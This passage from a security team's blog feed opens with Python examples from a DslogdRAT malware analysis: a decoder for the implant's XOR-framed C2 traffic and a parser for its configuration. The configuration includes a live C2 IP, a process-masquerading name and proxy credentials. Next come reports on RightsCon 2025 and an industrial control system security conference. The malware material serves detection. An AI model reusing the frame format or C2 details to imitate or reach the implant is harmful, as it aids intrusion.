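XOR_KEY = bytes(range(1, 8))            # 01..07, repeats every 7 bytes
FRAME_HEADER = b"\xff\xff\xff\xff\x0f\x00"
HEADER_LEN = len(FRAME_HEADER) + 4      # + u32 data length = 10 bytes


def xor_codec(data: bytes) -> bytes:
    """Encode or decode a payload; XOR with the same key is its own inverse."""
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(data))


def build_frame(plaintext: bytes) -> bytes:
    """Wrap a plaintext payload the way the implant would put it on the wire."""
    body = xor_codec(plaintext)
    return FRAME_HEADER + struct.pack("<I", len(body)) + body


def parse_frame(buf: bytes, offset: int = 0):
    """Decode one frame at offset; return (payload, offset just past the frame)."""
    hdr = buf[offset:offset + HEADER_LEN]
    if len(hdr) < HEADER_LEN or not hdr.startswith(FRAME_HEADER):
        raise ValueError("no DslogdRAT frame header at offset %d" % offset)
    (length,) = struct.unpack("<I", hdr[len(FRAME_HEADER):])
    start = offset + HEADER_LEN
    body = buf[start:start + length]
    if len(body) != length:
        raise ValueError("truncated frame: want %d bytes, have %d" % (length, len(body)))
    return xor_codec(body), start + length


def extract_frames(stream: bytes) -> list:
    """Pull every well-formed frame out of a reassembled TCP stream.

    Bytes that do not start a valid frame are skipped to the next header
    candidate, so one damaged or truncated frame does not hide the ones after it.
    """
    frames, pos = [], 0
    while 0 <= pos < len(stream):
        try:
            payload, pos = parse_frame(stream, pos)
            frames.append(payload)
        except ValueError:
            pos = stream.find(FRAME_HEADER, pos + 1)   # -1 ends the loop
    return frames


# Constructed stand-in for the host information sent in the initial beacon.
SAMPLE_BEACON = b"hostname=vpn-gw01;uid=0;bin=/home/bin/dslogd"

if __name__ == "__main__":
    wire = build_frame(SAMPLE_BEACON)
    print("frame header:", wire[:HEADER_LEN].hex(" "))
    # A stream with leading noise, one good frame, a cut-off header, another good frame.
    print(extract_frames(b"\x00noise" + wire + wire[:8] + wire))
```

<p>Running the module prints the 10-byte header of one constructed frame and the two payloads recovered from a stream that also contains noise and a truncated header. Because the key is fixed and known, the same decoder can be dropped into a packet-capture post-processing script to recover DslogdRAT sessions; the six header bytes ff ff ff ff 0f 00 at the start of a TCP payload make a cheap first-pass content match, but they are short enough that a hit should be confirmed by decoding the frame rather than treated as proof on its own.</p>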
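<p>The configuration layout of Appendix A, as an added worked example (not code from the JPCERT/CC post or from the malware; all names are this example's own): a Python parser for a decrypted DslogdRAT configuration blob, with the Table 2 values rebuilt into a sample blob so that it runs offline. Field widths are inferred from the gaps between the Table 1 offsets; the little-endian 32-bit integers, NUL-terminated strings in 0x100-byte slots, the 0x834-byte total size and the reading of the "null" node-name entry as an empty string are assumptions. The decryption step that produces the blob is out of scope here.</p>

```python
"""DslogdRAT configuration parser.

Added example for this page; it is not code from the JPCERT/CC post or from
the malware. It turns the layout in Table 1 (Appendix A) into a parser for a
decrypted configuration blob and rebuilds the Table 2 values into a sample
blob to run it on. Assumptions not stated in the post: 4-byte fields are
unsigned 32-bit little-endian, string fields are NUL-terminated inside their
0x100-byte slots, the blob is 0x834 bytes, and the "null" node-name string in
Table 2 is an empty string. Decrypting the config is out of scope here.
"""
import struct

# (field, offset, size, kind); sizes are the gaps between the Table 1 offsets.
CONFIG_LAYOUT = (
    ("config_tag",          0x000, 0x004, "raw"),
    ("listen_mode",         0x004, 0x004, "u32"),
    ("c2_ip",               0x008, 0x100, "str"),
    ("c2_port",             0x108, 0x004, "u32"),
    ("sleep_time",          0x10C, 0x004, "u32"),
    ("timeout",             0x110, 0x004, "u32"),
    ("shell_path",          0x114, 0x100, "str"),
    ("shell_cmd_string",    0x214, 0x100, "str"),
    ("thread_string",       0x314, 0x100, "str"),
    ("node_name_string",    0x414, 0x100, "str"),
    ("proxy_server",        0x514, 0x100, "str"),
    ("proxy_user",          0x614, 0x100, "str"),
    ("proxy_password",      0x714, 0x100, "str"),
    ("proxy_port",          0x814, 0x004, "u32"),
    ("lower_hour",          0x818, 0x004, "u32"),
    ("upper_hour",          0x81C, 0x004, "u32"),
    ("source_port_enabled", 0x820, 0x004, "u32"),
    ("setsockopt_value",    0x824, 0x004, "u32"),
    ("source_port",         0x828, 0x004, "u32"),
    ("sleep_enabled_1",     0x82C, 0x004, "u32"),
    ("sleep_enabled_2",     0x830, 0x004, "u32"),
)
CONFIG_SIZE = 0x834


def parse_config(blob: bytes) -> dict:
    """Decode a decrypted config blob into {field: value}."""
    if len(blob) < CONFIG_SIZE:
        raise ValueError("config blob too short: %d < %d" % (len(blob), CONFIG_SIZE))
    cfg = {}
    for name, off, size, kind in CONFIG_LAYOUT:
        field = blob[off:off + size]
        if kind == "u32":
            cfg[name] = struct.unpack("<I", field)[0]
        elif kind == "str":
            cfg[name] = field.split(b"\x00", 1)[0].decode("ascii", "replace")
        else:
            cfg[name] = field.hex()
    return cfg


def build_config(values: dict) -> bytes:
    """Inverse of parse_config; used here only to construct the sample blob."""
    buf = bytearray(CONFIG_SIZE)
    for name, off, size, kind in CONFIG_LAYOUT:
        if kind == "u32":
            struct.pack_into("<I", buf, off, values[name])
        elif kind == "str":
            raw = values[name].encode("ascii")
            if len(raw) >= size:           # leave room for the NUL terminator
                raise ValueError("%s does not fit in %d bytes" % (name, size))
            buf[off:off + len(raw)] = raw
        else:
            buf[off:off + size] = bytes.fromhex(values[name])
    return bytes(buf)


def network_iocs(cfg: dict) -> dict:
    """Summarise the network-facing settings, with the C2 address defanged."""
    return {
        "c2": "%s:%d" % (cfg["c2_ip"].replace(".", "[.]"), cfg["c2_port"]),
        "proxy": "%s:%d" % (cfg["proxy_server"], cfg["proxy_port"]),
        "proxy_creds": "%s:%s" % (cfg["proxy_user"], cfg["proxy_password"]),
        "hour_limits": (cfg["lower_hour"], cfg["upper_hour"]),   # Table 1: lower/upper hour limit
        "source_port": cfg["source_port"] if cfg["source_port_enabled"] else None,
    }


# Constructed from Table 2; a real blob would come out of the decryption step.
SAMPLE_CONFIG = build_config({
    "config_tag": "9582e30e", "listen_mode": 0,
    "c2_ip": "3.112.192.119", "c2_port": 443, "sleep_time": 1250, "timeout": 30,
    "shell_path": "/bin/sh", "shell_cmd_string": "[kworker/0:02]",
    "thread_string": "/home/bin/dslogd", "node_name_string": "",
    "proxy_server": "127.0.0.1", "proxy_user": "admin", "proxy_password": "admin",
    "proxy_port": 65500, "lower_hour": 8, "upper_hour": 20,
    "source_port_enabled": 0, "setsockopt_value": 240, "source_port": 12345,
    "sleep_enabled_1": 1, "sleep_enabled_2": 1,
})

if __name__ == "__main__":
    for key, value in network_iocs(parse_config(SAMPLE_CONFIG)).items():
        print("%-12s %s" % (key, value))
```

<p>The layout table is the only malware-specific part; the same parse/build pair can be pointed at a blob carved from memory or from the decrypted config section of another sample, and the round trip (build, then parse) is a quick check that the offsets add up to the total size without overlaps. The C2 IP is defanged only in the summary so that the raw value stays usable for matching against proxy and NetFlow logs.</p>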
  50. RightsCon 2025 Participation Report

    Wed, 09 Apr 2025 04:00:00 -0000

    <p>Hello, this is 米澤 from the Global Coordination Division. From 24 to 27 February 2025 I attended the international conference RightsCon 2025<a href="#01">[1]</a> in Taipei, and in this post I introduce the conference and what it was like on site. </p> <h3>What is RightsCon?</h3> <p>RightsCon is one of the world's leading international conferences on human rights in the digital age. It is organised by the US non-profit Access Now and has been held in cities around the world, including San José, Tunis, Toronto, Brussels, Rio de Janeiro, Manila and San Francisco. Participants include civil society organisations, government officials, journalists, business leaders, researchers and technologists, who discuss from many perspectives how to realise a free, open and secure digital world. The 30 sponsors included governments such as Canada and the Netherlands, large technology companies such as Meta, Google and Microsoft, and Internet resource organisations such as APNIC and TWNIC. </p> <p>This thirteenth RightsCon was the first to be held in East Asia. According to Taiwan's Ministry of Digital Affairs, roughly 3,200 people from 155 countries and regions took part<a href="#02">[2]</a>. Exact participant numbers and demographics will presumably be published on the official RightsCon site later.</p> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-3694866 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/Rightscon1-450wri.jpg" alt="" width="450" height="338"><figcaption>Venue entrance</figcaption> </figure></p> <p>The programme themes reflect each year's social concerns and issues. This year there were 18 themes, including "AI and emerging technology", "governance, politics and elections", "Internet access and inclusion", "content governance" and "online hate and violence". There were about 550 sessions, held in person, online or in hybrid form, with up to 22 running in parallel. Since it is impossible to attend everything, you have to pick from the themes that interest you. </p> <p>Because the conference deals with human rights, great care was taken over security and privacy at the venue. Security staff were stationed throughout, photography and video were prohibited as a rule, and even in the first-floor area where photography was allowed, participants were asked to keep out of frame anyone wearing a red-strap pass, which signalled "do not photograph". The venue was packed and buzzing, and it is a pity I cannot convey that in photographs.</p> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-3694867 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/Rightscon2-450wri.jpg" alt="" width="450" height="338"><figcaption>Flag stickers for the participant pass</figcaption> </figure></p> <p>At this RightsCon I mainly attended sessions on cybersecurity, global governance, capacity building and the regulation of commercial spyware, gathering information on international developments in these fields. Below I introduce three of the main discussions.</p> <h3>The importance of international cooperation against threats in cyberspace</h3> <p>On cybersecurity, the discussion centred on the importance of international cooperation and public-private partnership. Threats such as attacks on critical infrastructure and ransomware are rising in every country, and strengthening countermeasures has become an urgent task. Many threats are common across countries and regions, so sharing what each party knows and jointly analysing attack techniques and countermeasures leads to fewer incidents and faster response when they do occur. Examples raised included work within diplomatic frameworks such as the Quad, participation in international cyber defence exercises such as Locked Shields, long-term capacity building in regions where countermeasures lag, and stronger public-private cooperation in policy making and threat intelligence analysis. In a session on capacity building in the Indo-Pacific, speakers stressed the importance of visiting each region to understand its situation and needs, building trust, and supporting it over the long term.</p> <h3>The multi-stakeholder approach under strain</h3> <p>Another issue raised was that the multi-stakeholder approach, in which diverse stakeholders cooperate to solve problems, is in a difficult position. In Internet governance, the multi-stakeholder model, in which governments, private companies, civil society, technologists and others work together, is an important mechanism for maintaining a democratic and open Internet. For example, on the development and regulation of emerging technologies such as AI, the problem is that the technology is moving faster than the debate, and some argued that responding to this requires cooperation that includes the technical community.</p> <p>That model, however, is under threat. The sessions I attended cited the spread of authoritarian regimes, lack of funding, language barriers and knowledge gaps as barriers to participation. Many expressed concern that these barriers restrict the participation of civil society and private companies and that opportunities for dialogue will be lost. The value of the multi-stakeholder approach lies in supplying resources and expertise for technical policy discussions and in deepening understanding of the needs and problems of those affected by policy decisions; speakers argued that issues such as securing funding must be addressed so that civil society can keep taking part in these discussions. </p> <h3>International developments in commercial spyware regulation</h3> <p>Regulation of commercial spyware sold to governments for security purposes is a theme taken up at RightsCon every year. While some argue that surveillance technology using spyware contributes to security objectives such as preventing terrorism, research by the Canadian institute Citizen Lab and media reporting have shown that it is also used to violate the human rights and privacy of journalists and activists. The central difficulty in regulating spyware is where to draw the line between legitimate use and abuse. There have been several international moves on regulation. In the United States, the Biden administration issued an executive order restricting the federal government's use of commercial spyware<a href="#03">[3]</a>. The European Union set up the PEGA committee, which investigated spyware use against the standards of international human rights law and published recommendations for tighter regulation<a href="#04">[4]</a>. The United Kingdom and France led the launch of the international initiative known as the Pall Mall Process<a href="#05">[5]</a>, which aims to strengthen regulation through international cooperation; 27 states and organisations including Japan, 14 private companies and 12 civil society groups and research institutions have declared their participation. Concrete regulation and verification of its effectiveness are expected to follow from these efforts. Many other problems were also discussed, such as legal remedies and psychological care for victims of spyware. </p> <h3>Closing remarks</h3> <p>At RightsCon I felt that time to connect and talk with people is greatly valued. Meetup events were held at the venue, and ample time was reserved for questions between speakers and audience, so there were many opportunities for participants to mingle and exchange views freely. Few of the problems can be solved right away, but I came away feeling that speaking up, learning about the issues, holding repeated dialogue, pooling ideas and tackling what can be done now can eventually become a powerful force for change. It was also a valuable place to hear voices from a wide range of settings, from discussions of international norms and national policy to the work of research institutions and private companies and the activities of individual journalists. JPCERT/CC's main work is incident response support and information sharing with CSIRT communities in Japan and abroad, but I was reminded that our daily work to prevent damage from cyber attacks is itself part of protecting human rights in cyberspace. I want to keep thinking about how we can use our particular strengths to engage with the many cybersecurity issues discussed at RightsCon and contribute to solving them. </p> <p><figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-3694868 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/Rightscon3-450wri.jpg" alt="" width="450" height="338"><figcaption>The venue was right next to Taipei 101, the city's landmark</figcaption> </figure></p> <p style="text-align: right">Global Coordination Division, 米澤 詩歩乃</p> <h2>References</h2> <p><a name="01">[1]</a> RightsCon<br> <a href="https://www.rightscon.org/">https://www.rightscon.org/</a></p> <p><a name="02">[2]</a> MODA: RightsCon 2025 Successfully Concludes in Taipei, Marking a Milestone for Taiwan's Digital Diplomacy and Global AI Engagement<br> <a href="https://moda.gov.tw/en/press/press-releases/15448">https://moda.gov.tw/en/press/press-releases/15448</a></p> <p><a name="03">[3]</a> Executive Order on Prohibition on Use by the United States Government of Commercial Spyware that Poses Risks to National Security<br> <a href="https://bidenwhitehouse.archives.gov/briefing-room/presidential-actions/2023/03/27/executive-order-on-prohibition-on-use-by-the-united-states-government-of-commercial-spyware-that-poses-risks-to-national-security/">https://bidenwhitehouse.archives.gov/briefing-room/presidential-actions/2023/03/27/executive-order-on-prohibition-on-use-by-the-united-states-government-of-commercial-spyware-that-poses-risks-to-national-security/</a></p> <p><a name="04">[4]</a> PEGA Committee final report<br> <a href="https://www.rcmediafreedom.eu/Resources/Reports-and-papers/PEGA-Committee-final-report">https://www.rcmediafreedom.eu/Resources/Reports-and-papers/PEGA-Committee-final-report</a></p> <p><a name="05">[5]</a> The Pall Mall Process tackling the proliferation and irresponsible use of commercial cyber intrusion capabilities<br> <a href="https://www.gov.uk/government/publications/the-pall-mall-process-declaration-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities/the-pall-mall-process-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities">https://www.gov.uk/government/publications/the-pall-mall-process-declaration-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities/the-pall-mall-process-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities</a></p>
  51. Control System Security Conference 2025 Report

    Mon, 24 Mar 2025 05:00:00 -0000

    <p>JPCERT/CC held the <a href="https://www.jpcert.or.jp/event/ics-conference2025.html" target="_blank" rel="noopener">Control System Security Conference 2025</a> on 5 February 2025. The conference shares the current state of threats to control systems in Japan and abroad and the efforts of control system security stakeholders, with the aim of helping participants improve their control system security measures and establish best practices. It has been held every year since 2009, and this was the 17th edition.<br><br>This year it was held in hybrid form (venue plus online streaming), with 50 participants at the venue and 511 online (about 500 registrations, an expected audience of around 500, and a peak of roughly 250 concurrent viewers). This JPCERT/CC Eyes report covers the opening and closing remarks and the seven talks.</p> <h3>Opening remarks</h3> <p><strong>武尾 伸隆, Director, Cybersecurity Division, Commerce and Information Policy Bureau, Ministry of Economy, Trade and Industry<br></strong><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_00_MINISTRY_OF_ECONOMY_TRADE_AND_INDUSTRY.pdf" target="_blank" rel="noopener">Slides</a></p> <p>The opening remarks were given by Mr 武尾, Director of METI's Cybersecurity Division, Commerce and Information Policy Bureau.</p> <p data-sourcepos="13:1-13:422">He noted that ransomware attacks and attacks exploiting supply chain weaknesses are increasing, and that small and medium-sized enterprises in particular are being targeted, which has become a serious problem. These attack techniques keep evolving, and he warned that, under the influence of AI technology and geopolitical risk, they are likely to become more sophisticated and complex.</p> <p data-sourcepos="15:1-15:339">Internationally, the concept of secure by design is taking hold, and companies must also take responsibility for the security of their own products; for IoT devices in particular, compliance with security standards is now required in many countries.</p> <p data-sourcepos="17:1-17:430">Against this background METI is working to strengthen corporate cybersecurity: publishing security guidelines, supporting SMEs, studying a scheme to make the security posture of supply chain companies visible, building a security certification scheme for IoT products, and promoting the use of SBOMs.</p> <p data-sourcepos="19:1-19:288">He also introduced a security workforce development programme in which personnel seconded from companies receive a year of intensive training, with the emphasis on acquiring specialist skills and professional networks.</p> <p data-sourcepos="21:1-21:345">In conclusion, he said that the danger of cyber attacks grows every year and that SMEs in particular face large risks, so countermeasures must be strengthened nationwide, and closer public-private cooperation is needed to build a safer society.<br><br><img class="asset asset-image at-xid-3640588 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_01-640wri.png" alt="武尾 伸隆, Director, Cybersecurity Division, Commerce and Information Policy Bureau, METI" width="640" height="330"><br></p> <h3>Control system security today and tomorrow: looking back on the past year</h3> <p><strong>Speaker:<br>宮地 利雄, Technical Advisor, JPCERT Coordination Center</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_01_JPCERTCC.pdf" target="_blank" rel="noopener">Slides</a><br><a href="https://youtu.be/F07q95FhKNc" target="_blank" rel="noopener">YouTube</a></p> <p data-sourcepos="29:1-29:166">This talk reviewed the state of industrial control system (ICS) security as of 2025 and explained the main trends and changes.</p> <p data-sourcepos="31:1-31:480">On the general security picture, it noted that as geopolitical tensions rise, cybercrime is also becoming more sophisticated. The war in Ukraine and the US-China trade war are affecting supply chains, and cyber attacks targeting supply chains are increasing. To cope with this, companies are under growing pressure to strengthen risk management.</p> <p data-sourcepos="33:1-33:807">On ICS incident trends, ransomware attacks have not abated: two-thirds of the affected organisations are manufacturers, and about half of the affected organisations had to halt operations or product shipments. The number of ransomware cases is growing, but the great majority of reports come from regions such as the United States and Germany. Much recent ICS incident reporting is based on filings with the US Securities and Exchange Commission and is thin on technical detail; the reporting to CISA mandated by the Cyber Incident Reporting for Critical Infrastructure Act of 2022 is due to begin in two years, so some improvement can be expected.</p> <p data-sourcepos="35:1-35:444">Ransomware does not specifically target ICS, but a certain proportion of ransomware attacks do affect ICS, and damage in the manufacturing sector continues. Law enforcement has carried out international takedowns against some groups, but new groups keep appearing, and overall attack activity remains at a high level.</p> <p data-sourcepos="37:1-37:509">As new ICS-targeting malware, the talk introduced FrostyGoop, discovered by Dragos, and IOCONTROL, reported by Claroty. A study of malware found infecting ICS engineering environments also turned up several samples with ICS-specific functionality, although their developers and purpose are unknown, and the speaker suggested this could prompt a broader investigation of similar malware.</p> <p data-sourcepos="39:1-39:547">On the disclosure of vulnerabilities in ICS components and IoT devices, the number of advisories issued by CISA, which had been roughly constant for the preceding three years, rose by about 10% in 2024. Some vendors are running sweeping audits to clear out their vulnerabilities, but many vulnerabilities are inherited from shared libraries and the like, and there is no prospect of the stream of newly discovered ICS vulnerabilities drying up.</p> <p data-sourcepos="41:1-41:611">Turning to laws, regulations and standards: the deadline for transposing the EU's NIS2 Directive (the revised Network and Information Security Directive) into national law has passed, but quite a few member states are behind schedule. The Cyber Resilience Act has also entered into force, but attention is still needed until its detailed provisions are settled. On standards, the IEC 62443 series is entering a new phase, with the revision of part 2-1 and a draft revision of part 1-1.</p> <p data-sourcepos="43:1-43:764">The next section introduced new ICS security issues arising from new technologies. AI, and generative AI in particular, changed dramatically in 2024 and is attracting interest in the ICS world; the talk attempted a conceptual map of the security issues, centred on the vulnerabilities that come with using AI. It is also predicted that quantum computing will reach a practical level around 2035, at which point some cryptographic algorithms will be compromised. Given the long service life of ICS products, the speaker pointed out the need for a strategy to migrate to algorithms that will not be broken in the quantum computing era.</p> <p data-sourcepos="45:1-45:387">Finally, while characterising 2024 as a relatively calm year for ICS security, the talk noted that latent risks such as the geopolitical situation have by no means decreased and that the adoption of new technologies is bringing new security risks, and on that note summarised the year's ICS security trends.<br><br><img class="asset asset-image at-xid-3640590 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_02-640wri.png" alt="宮地 利雄, Technical Advisor, JPCERT Coordination Center" width="640" height="330"><br></p> <h2>&nbsp;</h2> <h3>The current state of the IEC 62443 control system security standards</h3> <p><strong>Speaker:<br>市川 幸宏, Cyber Advisory / Specialist Master, Deloitte Tohmatsu Cyber LLC</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_02_DELOITTE_TOHMATSU_CYBER.pdf" target="_blank" rel="noopener">Slides</a></p> <p data-sourcepos="53:1-53:613">Mr 市川's talk noted that cyber attacks on control systems have risen sharply in recent years, with ransomware a serious threat to manufacturing in particular, and that a range of laws, regulations and international standards have been drawn up in response. It then explained in detail the current state of the IEC 62443 series, IEC 62443-2-1 Edition 2.0 in particular, and considered future developments.</p> <p data-sourcepos="55:1-55:753">On the threat landscape, he cited ENISA (the European Union Agency for Cybersecurity) figures of 11,079 cybersecurity incidents between 2023 and 2024; ransomware attracted particular attention, manufacturing accounted for 17% of victim organisations, and among ransomware attacks LockBit had an especially high share (42.65%). In response to this growing threat, international standards such as IEC 62443 provide a framework for the required cybersecurity measures and guidance for organisations to manage security effectively.</p> <p data-sourcepos="57:1-57:800">IEC 62443 is an international standard for the cybersecurity of industrial automation and control systems (IACS), made up of several parts, which traditionally had four families: the -1 parts define the document set as a whole, the -2 parts address control system owners (those who maintain and operate factories and plants), the -2/-3 parts address system integrators (who build systems in cooperation with the owner and with the product suppliers), and the -4 parts address product suppliers. Recently the series has grown from four families to six, with -5 covering sector-specific adaptations beyond control systems and -6 covering conformity assessment criteria such as third-party certification.</p> <p data-sourcepos="59:1-59:751">IEC 62443-2-1 Edition 2.0 revises the first edition published in 2010 after about 14 years. It emphasises alignment with major standards such as the ISO/IEC 27000 series, spells out the process requirements an asset owner should put into practice organisationally, and classifies security measures into 8 elements subdivided into 16 subcategories. It also adopts the process maturity model (Maturity Level 1 to 4) shared with other parts of IEC 62443, giving asset owners a yardstick for assessing the maturity of their own security measures.</p> <p data-sourcepos="61:1-61:420">On the outlook for the IEC 62443 series, he said that conformity assessment related to IoT and certification is under consideration, which should enable more effective cybersecurity measures, and he expressed the hope that clarifying the relationship with other international standards and regulations will bring consistency to security requirements across industries.</p> <p data-sourcepos="63:1-64:300">In closing, he said that as cybersecurity threats evolve, international standards such as IEC 62443 are extremely important; the new guidance in IEC 62443-2-1 Edition 2.0 in particular will help asset owners deepen their organisational understanding of security, and such standards are expected to keep evolving so that stronger responses to the threats the industry faces can be put in place. Cybersecurity is no longer a matter for a few specialists but a challenge every company must address in common, so the industry needs to deepen its understanding of control system security and work towards a safer future.<br><br><img class="asset asset-image at-xid-3640591 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_03-640wri.png" alt="市川 幸宏, Cyber Advisory / Specialist Master, Deloitte Tohmatsu Cyber LLC" width="640" height="324"><br>&nbsp;</p> <h3>A process safety management framework that takes cybersecurity into account</h3> <p><strong>Speaker:<br>田邊 雅幸, Representative Member, Strategic PSM Study Group LLC / Visiting Professor, IMS, Yokohama National University</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_03_STRATEGIC_PSM.pdf" target="_blank" rel="noopener">Slides</a></p> <p data-sourcepos="71:1-71:342">Mr 田邊 was invited to share the results of the Strategic PSM Study Group's work on a risk-based process safety management system and on a risk assessment that takes cybersecurity into account.</p> <p data-sourcepos="73:1-73:532">He first described the Strategic PSM Study Group, which he leads. The group began in 2020 as a study group on the effective adoption of risk-based PSM (Process Safety Management), hosted by the Institute of Advanced Sciences at Yokohama National University, and was incorporated in 2023. In 2024 it discussed integrating cybersecurity with PSM, and those results form the basis of this talk.</p> <p data-sourcepos="75:1-75:257">Strategic PSM takes a risk-based approach and additionally incorporates the life-cycle management defined in IEC 61508/61511 and the thinking of the CCPS 20-element model.</p> <p data-sourcepos="77:1-77:435">Applying PSM to cybersecurity likewise uses life-cycle management and the CCPS 20 elements; by using these methods to establish a cybersecurity risk profile, the group is attempting to integrate cybersecurity with risk-based PSM, and the talk shared the results.</p> <p data-sourcepos="79:1-79:517">The cybersecurity risk assessment, based on reference literature, was carried out in the following sequence: 1) select the target and collect basic information, 2) CS-PHA, 3) CS-HAZOP, 4) CS-LOPA, 5) determine the security level (SL) and functional requirements, 6) evaluate the network architecture and decide on countermeasures. For each step he explained the method and shared the results of evaluating a sample system.</p> <p data-sourcepos="81:1-81:666">Finally he discussed the organisational structure for managing the results of the risk assessment. For process safety management that takes cybersecurity into account, he concluded, a team should be formed with specialists from process safety (PS), occupational health and safety (OHS), environmental safety (ENV) and cybersecurity (CS), and a key point for that team to function is developing people who can interpret between IT and OT.<br><br><img class="asset asset-image at-xid-3646914 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_04_1-640wri.png" alt="田邊 雅幸, Representative Member, Strategic PSM Study Group LLC / Visiting Professor, IMS, Yokohama National University" width="640" height="325"><br></p> <p></p> <h3>Risk reduction in control systems using CTEM</h3> <p><strong>Speaker:<br>加藤 俊介, APJ Sales/Solution Engineer, Claroty Ltd.</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_04_CLAROTY.pdf" target="_blank" rel="noopener">Slides</a></p> <p data-sourcepos="88:1-88:229">Mr 加藤's talk explained in detail a case of applying CTEM (Continuous Threat Exposure Management), a much-discussed approach in recent years, to control systems.</p> <p data-sourcepos="90:1-90:694">He first pointed out, as a general problem for security measures, that attacks targeting ICS have a large impact and that layered countermeasures designed around business impact are needed, and then explained CTEM. CTEM is a concept proposed by Gartner: an iterative process by which an organisation continuously manages cyber risk and improves security, a continuous and dynamic way of operating that emphasises assessment in terms of business impact in order to manage overall risk.</p> <p data-sourcepos="92:1-92:334">He then explained the points of applying CTEM to control systems at each step, from phase 1 (scoping) to phase 5 (mobilisation), taking into account the particular circumstances of control systems.</p> <p data-sourcepos="94:1-94:1301">For phase 1, scoping, he gave examples such as setting the scope on the basis of assumed business damage. For phase 2, discovery, he explained that information on the assets scoped in phase 1 must be collected from the viewpoints of asset details, connectivity and operations. For phase 3, prioritisation, he explained state-based approaches (device type plus published vulnerabilities plus data flow, i.e. communication patterns) and risk-score-based prioritisation with quantified risk values. Phase 4, validation, checks whether an attack is actually feasible; in ICS, because of concerns about the impact on availability, desk-based validation using evidence such as network packets and configuration files is the realistic option. For phase 5, mobilisation, he gave examples of technical measures at the endpoint, network and PLC-coding levels, and stressed that reporting and getting stakeholders involved in implementing countermeasures should appeal to business impact.</p> <p data-sourcepos="96:1-96:295">In summary, he cited three reasons CTEM can be used for the continuous improvement of control system security: its continuity, its comprehensiveness in viewing the whole system, and its rationality in reasoning from business impact.<br><br><img class="asset asset-image at-xid-3640594 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_05-640wri.png" alt="加藤 俊介, APJ Sales/Solution Engineer, Claroty Ltd." width="640" height="330"></p> <p></p> <h3>Talk session: Lessons from running the "factory incident response exercise scenario" - what practical exercises should control-system SIRTs and other in-house stakeholders undertake?</h3> <p><strong>Speakers:<br>荒木 一匡, Senior Staff, Cybersecurity Management Department (concurrently Kurashiki Control Department, West Japan Works), JFE Steel Corporation</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_05_JFE_STEEL.pdf" target="_blank" rel="noopener">Slides</a><strong><br><br>河野 一之, Senior Analyst, Control System Security, Domestic Coordination Group, JPCERT Coordination Center</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_05_JPCERTCC.pdf" target="_blank" rel="noopener">Slides</a></p> <p data-sourcepos="104:1-104:120">Taking advantage of the in-person format, this session combined presentations with a talk session.</p> <p data-sourcepos="106:1-112:249">First, Mr 荒木 of JFE Steel introduced the company's control system security efforts to date (organisation building, an OT security incident response policy, technical OT security measures, and so on). In recent years the company has been using incident response exercises to embed its OT security incident response policy across the organisation. In that context it became interested in the factory-oriented incident response exercise scenario that the JPCERT/CC-hosted ICS security practitioner community has been working on this fiscal year (presented by community members at the previous Control System Security Conference 2024), and took part in the effort together with seven other organisations. He described the incident response exercises the company ran this year: they were held at every site, and more than 800 people in total took part, including the "control-system SIRT" (a so-called FSIRT) and the control departments.</p> <p data-sourcepos="114:1-118:120">JPCERT/CC, which compiled and evaluated the results from the eight organisations, then presented selected strengths and issues from the evaluation. Strengths included contact networks for security incidents being prepared in advance, incident response manuals covering factories taking shape, and organisations establishing arrangements for consolidating information during an emergency. Issues included unclear communication content, insufficient advance preparation such as securing the resources needed to handle evidence preservation and business continuity in parallel, and ambiguity in the factors used to decide on restarting production after a shutdown.</p> <p data-sourcepos="120:1-121:33">In the talk session that followed the presentations, Mr 荒木 was interviewed on the following themes. The questions and answers were as follows.</p> <p>● How did you feel about the three elements built into this exercise: "the significance of the exercise", "routine practice" and "external coordination"?</p> <ul> <li>There are "experiential" exercises among others, but this time we approached it as an opportunity for maturing and embedding, so that participants can perform the fixed initial response, such as the prescribed communications, as a matter of course in order to minimise damage.</li> <li>Like disaster drills, these exercises need to be run regularly so that the response becomes second nature and people can act without confusion when something happens. This scenario and community participation reduced the burden on our control-system SIRT in preparing exercises and made "routine practice" more feasible.</li> <li>Until now "exercises" were mostly self-contained within our organisation, but participating in the community made me appreciate the importance of building "external coordination" elements (such as information sharing with JPCERT/CC) into exercises as well.</li> </ul> <p>● What is the benefit of involving the control-system SIRT and other in-house stakeholders in exercises?</p> <ul> <li style="box-sizing: border-box;"><span style="box-sizing: border-box;">The control-system SIRT, which leads incident response and control system security within the control departments, took part as organiser, and the control system owner departments took part as on-site operators. Because the owner departments have a wide variety of equipment and operating processes, they need to understand their own risks and work out for themselves what to do in an emergency, which is one reason their participation matters.</span></li> </ul> <p>● Were there differences between IT and OT 